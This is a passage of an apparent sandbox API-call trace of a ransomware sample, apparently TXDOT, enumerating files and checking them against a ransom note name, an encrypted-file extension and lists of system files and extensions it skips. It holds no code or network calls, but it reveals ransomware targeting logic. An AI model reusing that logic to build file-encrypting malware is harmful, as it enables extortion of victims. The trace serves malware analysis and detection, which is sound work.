psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0071.732] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate8.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" [0071.732] PathFindExtensionW (pszPath="Rotate8.ico") returned=".ico" [0071.732] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0071.732] StrCmpIW (psz1="Rotate8.ico", psz2="bootsect.bak") returned 1 [0071.732] StrCmpIW (psz1="Rotate8.ico", psz2="iconcache.db") returned 1 [0071.732] StrCmpIW (psz1="Rotate8.ico", psz2="thumbs.db") returned -1 [0071.733] StrCmpIW (psz1="Rotate8.ico", psz2=" ransomware ") returned 1 [0071.733] StrCmpIW (psz1="Rotate8.ico", psz2=" ransom ") returned 1 [0071.733] StrCmpIW (psz1="Rotate8.ico", psz2="debug.txt") returned 1 [0071.733] StrCmpIW (psz1="Rotate8.ico", psz2="boot.ini") returned 1 [0071.733] StrCmpIW (psz1="Rotate8.ico", psz2="desktop.ini") returned 1 [0071.733] StrCmpIW (psz1="Rotate8.ico", psz2="autorun.inf") returned 1 [0071.733] StrCmpIW (psz1="Rotate8.ico", psz2="ntuser.dat") returned 1 [0071.733] StrCmpIW (psz1="Rotate8.ico", psz2="ntldr") returned 1 [0071.733] StrCmpIW (psz1="Rotate8.ico", psz2="ntdetect.com") returned 1 [0071.733] StrCmpIW (psz1="Rotate8.ico", psz2="bootfont.bin") returned 1 [0071.733] StrCmpIW (psz1="Rotate8.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.733] PathFindExtensionW (pszPath="Rotate8.ico") returned=".ico" [0071.733] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.733] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Save.ico", cAlternateFileName="")) returned 1 [0071.733] StrCmpW (psz1="Save.ico", psz2=".") returned 1 [0071.733] StrCmpW (psz1="Save.ico", psz2="..") returned 1 [0071.733] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0071.733] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0071.733] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Save.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Save.ico" [0071.733] PathFindExtensionW (pszPath="Save.ico") returned=".ico" [0071.733] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0071.733] StrCmpIW (psz1="Save.ico", psz2="bootsect.bak") returned 1 [0071.733] StrCmpIW (psz1="Save.ico", psz2="iconcache.db") returned 1 [0071.733] StrCmpIW (psz1="Save.ico", psz2="thumbs.db") returned -1 [0071.733] StrCmpIW (psz1="Save.ico", psz2=" ransomware ") returned 1 [0071.733] StrCmpIW (psz1="Save.ico", psz2=" ransom ") returned 1 [0071.733] StrCmpIW (psz1="Save.ico", psz2="debug.txt") returned 1 [0071.733] StrCmpIW (psz1="Save.ico", psz2="boot.ini") returned 1 [0071.733] StrCmpIW (psz1="Save.ico", psz2="desktop.ini") returned 1 [0071.733] StrCmpIW (psz1="Save.ico", psz2="autorun.inf") returned 1 [0071.733] StrCmpIW (psz1="Save.ico", psz2="ntuser.dat") returned 1 [0071.733] StrCmpIW (psz1="Save.ico", psz2="ntldr") returned 1 [0071.733] StrCmpIW (psz1="Save.ico", psz2="ntdetect.com") returned 1 [0071.733] StrCmpIW (psz1="Save.ico", psz2="bootfont.bin") returned 1 [0071.733] StrCmpIW (psz1="Save.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.734] PathFindExtensionW (pszPath="Save.ico") returned=".ico" [0071.734] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.734] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x8f66, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Setup.ico", cAlternateFileName="")) returned 1 [0071.734] StrCmpW (psz1="Setup.ico", psz2=".") returned 1 [0071.734] StrCmpW (psz1="Setup.ico", psz2="..") returned 1 [0071.734] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0071.734] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0071.734] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Setup.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" [0071.734] PathFindExtensionW (pszPath="Setup.ico") returned=".ico" [0071.734] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0071.734] StrCmpIW (psz1="Setup.ico", psz2="bootsect.bak") returned 1 [0071.734] StrCmpIW (psz1="Setup.ico", psz2="iconcache.db") returned 1 [0071.734] StrCmpIW (psz1="Setup.ico", psz2="thumbs.db") returned -1 [0071.734] StrCmpIW (psz1="Setup.ico", psz2=" ransomware ") returned 1 [0071.734] StrCmpIW (psz1="Setup.ico", psz2=" ransom ") returned 1 [0071.734] StrCmpIW (psz1="Setup.ico", psz2="debug.txt") returned 1 [0071.734] StrCmpIW (psz1="Setup.ico", psz2="boot.ini") returned 1 [0071.734] StrCmpIW (psz1="Setup.ico", psz2="desktop.ini") returned 1 [0071.734] StrCmpIW (psz1="Setup.ico", psz2="autorun.inf") returned 1 [0071.734] StrCmpIW (psz1="Setup.ico", psz2="ntuser.dat") returned 1 [0071.734] StrCmpIW (psz1="Setup.ico", psz2="ntldr") returned 1 [0071.734] StrCmpIW (psz1="Setup.ico", psz2="ntdetect.com") returned 1 [0071.734] StrCmpIW (psz1="Setup.ico", psz2="bootfont.bin") returned 1 [0071.734] StrCmpIW (psz1="Setup.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.734] PathFindExtensionW (pszPath="Setup.ico") returned=".ico" [0071.734] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.734] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b5e7f00, ftCreationTime.dwHighDateTime=0x1ca927c, ftLastAccessTime.dwLowDateTime=0x5b5e7f00, ftLastAccessTime.dwHighDateTime=0x1ca927c, ftLastWriteTime.dwLowDateTime=0x5b5e7f00, ftLastWriteTime.dwHighDateTime=0x1ca927c, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="stop.ico", cAlternateFileName="")) returned 1 [0071.734] StrCmpW (psz1="stop.ico", psz2=".") returned 1 [0071.734] StrCmpW (psz1="stop.ico", psz2="..") returned 1 [0071.734] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0071.734] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0071.734] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="stop.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned="C:\\588bce7c90097ed212\\Graphics\\stop.ico" [0071.734] PathFindExtensionW (pszPath="stop.ico") returned=".ico" [0071.734] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0071.735] StrCmpIW (psz1="stop.ico", psz2="bootsect.bak") returned 1 [0071.735] StrCmpIW (psz1="stop.ico", psz2="iconcache.db") returned 1 [0071.735] StrCmpIW (psz1="stop.ico", psz2="thumbs.db") returned -1 [0071.735] StrCmpIW (psz1="stop.ico", psz2=" ransomware ") returned 1 [0071.735] StrCmpIW (psz1="stop.ico", psz2=" ransom ") returned 1 [0071.735] StrCmpIW (psz1="stop.ico", psz2="debug.txt") returned 1 [0071.735] StrCmpIW (psz1="stop.ico", psz2="boot.ini") returned 1 [0071.735] StrCmpIW (psz1="stop.ico", psz2="desktop.ini") returned 1 [0071.735] StrCmpIW (psz1="stop.ico", psz2="autorun.inf") returned 1 [0071.735] StrCmpIW (psz1="stop.ico", psz2="ntuser.dat") returned 1 [0071.735] StrCmpIW (psz1="stop.ico", psz2="ntldr") returned 1 [0071.735] StrCmpIW (psz1="stop.ico", psz2="ntdetect.com") returned 1 [0071.735] StrCmpIW (psz1="stop.ico", psz2="bootfont.bin") returned 1 [0071.735] StrCmpIW (psz1="stop.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.735] PathFindExtensionW (pszPath="stop.ico") returned=".ico" [0071.735] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.735] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="SysReqMet.ico", cAlternateFileName="SYSREQ~1.ICO")) returned 1 [0071.735] StrCmpW (psz1="SysReqMet.ico", psz2=".") returned 1 [0071.735] StrCmpW (psz1="SysReqMet.ico", psz2="..") returned 1 [0071.735] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0071.735] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0071.735] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="SysReqMet.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" [0071.735] PathFindExtensionW (pszPath="SysReqMet.ico") returned=".ico" [0071.735] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0071.735] StrCmpIW (psz1="SysReqMet.ico", psz2="bootsect.bak") returned 1 [0071.735] StrCmpIW (psz1="SysReqMet.ico", psz2="iconcache.db") returned 1 [0071.735] StrCmpIW (psz1="SysReqMet.ico", psz2="thumbs.db") returned -1 [0071.735] StrCmpIW (psz1="SysReqMet.ico", psz2=" ransomware ") returned 1 [0071.735] StrCmpIW (psz1="SysReqMet.ico", psz2=" ransom ") returned 1 [0071.735] StrCmpIW (psz1="SysReqMet.ico", psz2="debug.txt") returned 1 [0071.735] StrCmpIW (psz1="SysReqMet.ico", psz2="boot.ini") returned 1 [0071.735] StrCmpIW (psz1="SysReqMet.ico", psz2="desktop.ini") returned 1 [0071.735] StrCmpIW (psz1="SysReqMet.ico", psz2="autorun.inf") returned 1 [0071.735] StrCmpIW (psz1="SysReqMet.ico", psz2="ntuser.dat") returned 1 [0071.735] StrCmpIW (psz1="SysReqMet.ico", psz2="ntldr") returned 1 [0071.735] StrCmpIW (psz1="SysReqMet.ico", psz2="ntdetect.com") returned 1 [0071.736] StrCmpIW (psz1="SysReqMet.ico", psz2="bootfont.bin") returned 1 [0071.736] StrCmpIW (psz1="SysReqMet.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.736] PathFindExtensionW (pszPath="SysReqMet.ico") returned=".ico" [0071.736] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.736] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="SysReqNotMet.ico", cAlternateFileName="SYSREQ~2.ICO")) returned 1 [0071.736] StrCmpW (psz1="SysReqNotMet.ico", psz2=".") returned 1 [0071.736] StrCmpW (psz1="SysReqNotMet.ico", psz2="..") returned 1 [0071.736] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0071.736] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0071.736] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="SysReqNotMet.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" [0071.736] PathFindExtensionW (pszPath="SysReqNotMet.ico") returned=".ico" [0071.736] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0071.736] StrCmpIW (psz1="SysReqNotMet.ico", psz2="bootsect.bak") returned 1 [0071.736] StrCmpIW (psz1="SysReqNotMet.ico", psz2="iconcache.db") returned 1 [0071.736] StrCmpIW (psz1="SysReqNotMet.ico", psz2="thumbs.db") returned -1 [0071.736] StrCmpIW (psz1="SysReqNotMet.ico", psz2=" ransomware ") returned 1 [0071.736] StrCmpIW (psz1="SysReqNotMet.ico", psz2=" ransom ") returned 1 [0071.736] StrCmpIW (psz1="SysReqNotMet.ico", psz2="debug.txt") returned 1 [0071.736] StrCmpIW (psz1="SysReqNotMet.ico", psz2="boot.ini") returned 1 [0071.736] StrCmpIW (psz1="SysReqNotMet.ico", psz2="desktop.ini") returned 1 [0071.736] StrCmpIW (psz1="SysReqNotMet.ico", psz2="autorun.inf") returned 1 [0071.736] StrCmpIW (psz1="SysReqNotMet.ico", psz2="ntuser.dat") returned 1 [0071.736] StrCmpIW (psz1="SysReqNotMet.ico", psz2="ntldr") returned 1 [0071.736] StrCmpIW (psz1="SysReqNotMet.ico", psz2="ntdetect.com") returned 1 [0071.736] StrCmpIW (psz1="SysReqNotMet.ico", psz2="bootfont.bin") returned 1 [0071.736] StrCmpIW (psz1="SysReqNotMet.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.736] PathFindExtensionW (pszPath="SysReqNotMet.ico") returned=".ico" [0071.736] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.736] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="warn.ico", cAlternateFileName="")) returned 1 [0071.736] StrCmpW (psz1="warn.ico", psz2=".") returned 1 [0071.737] StrCmpW (psz1="warn.ico", psz2="..") returned 1 [0071.737] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0071.737] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0071.737] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="warn.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned="C:\\588bce7c90097ed212\\Graphics\\warn.ico" [0071.737] PathFindExtensionW (pszPath="warn.ico") returned=".ico" [0071.737] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0071.737] StrCmpIW (psz1="warn.ico", psz2="bootsect.bak") returned 1 [0071.737] StrCmpIW (psz1="warn.ico", psz2="iconcache.db") returned 1 [0071.737] StrCmpIW (psz1="warn.ico", psz2="thumbs.db") returned 1 [0071.737] StrCmpIW (psz1="warn.ico", psz2=" ransomware ") returned 1 [0071.737] StrCmpIW (psz1="warn.ico", psz2=" ransom ") returned 1 [0071.737] StrCmpIW (psz1="warn.ico", psz2="debug.txt") returned 1 [0071.737] StrCmpIW (psz1="warn.ico", psz2="boot.ini") returned 1 [0071.737] StrCmpIW (psz1="warn.ico", psz2="desktop.ini") returned 1 [0071.737] StrCmpIW (psz1="warn.ico", psz2="autorun.inf") returned 1 [0071.737] StrCmpIW (psz1="warn.ico", psz2="ntuser.dat") returned 1 [0071.737] StrCmpIW (psz1="warn.ico", psz2="ntldr") returned 1 [0071.737] StrCmpIW (psz1="warn.ico", psz2="ntdetect.com") returned 1 [0071.737] StrCmpIW (psz1="warn.ico", psz2="bootfont.bin") returned 1 [0071.737] StrCmpIW (psz1="warn.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.737] PathFindExtensionW (pszPath="warn.ico") returned=".ico" [0071.737] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.737] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="warn.ico", cAlternateFileName="")) returned 0 [0071.737] FindClose (in: hFindFile=0xec2330 | out: hFindFile=0xec2330) returned 1 [0071.739] GetProcessHeap () returned 0xe30000 [0071.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0071.739] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0xe2c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="header.bmp", cAlternateFileName="")) returned 1 [0071.739] StrCmpW (psz1="header.bmp", psz2=".") returned 1 [0071.739] StrCmpW (psz1="header.bmp", psz2="..") returned 1 [0071.739] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.739] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.739] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="header.bmp", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\header.bmp") returned="C:\\588bce7c90097ed212\\header.bmp" [0071.740] PathFindExtensionW (pszPath="header.bmp") returned=".bmp" [0071.740] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0071.740] StrCmpIW (psz1="header.bmp", psz2="bootsect.bak") returned 1 [0071.740] StrCmpIW (psz1="header.bmp", psz2="iconcache.db") returned -1 [0071.740] StrCmpIW (psz1="header.bmp", psz2="thumbs.db") returned -1 [0071.740] StrCmpIW (psz1="header.bmp", psz2=" ransomware ") returned 1 [0071.740] StrCmpIW (psz1="header.bmp", psz2=" ransom ") returned 1 [0071.740] StrCmpIW (psz1="header.bmp", psz2="debug.txt") returned 1 [0071.740] StrCmpIW (psz1="header.bmp", psz2="boot.ini") returned 1 [0071.740] StrCmpIW (psz1="header.bmp", psz2="desktop.ini") returned 1 [0071.740] StrCmpIW (psz1="header.bmp", psz2="autorun.inf") returned 1 [0071.740] StrCmpIW (psz1="header.bmp", psz2="ntuser.dat") returned -1 [0071.740] StrCmpIW (psz1="header.bmp", psz2="ntldr") returned -1 [0071.740] StrCmpIW (psz1="header.bmp", psz2="ntdetect.com") returned -1 [0071.740] StrCmpIW (psz1="header.bmp", psz2="bootfont.bin") returned 1 [0071.740] StrCmpIW (psz1="header.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.740] PathFindExtensionW (pszPath="header.bmp") returned=".bmp" [0071.740] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0071.740] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.740] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.740] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.740] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.740] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.740] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.741] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x66ea7e00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0xad1384b, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Core.mzz", cAlternateFileName="NETFX_~1.MZZ")) returned 1 [0071.741] StrCmpW (psz1="netfx_Core.mzz", psz2=".") returned 1 [0071.741] StrCmpW (psz1="netfx_Core.mzz", psz2="..") returned 1 [0071.741] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.741] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.741] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Core.mzz", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Core.mzz") 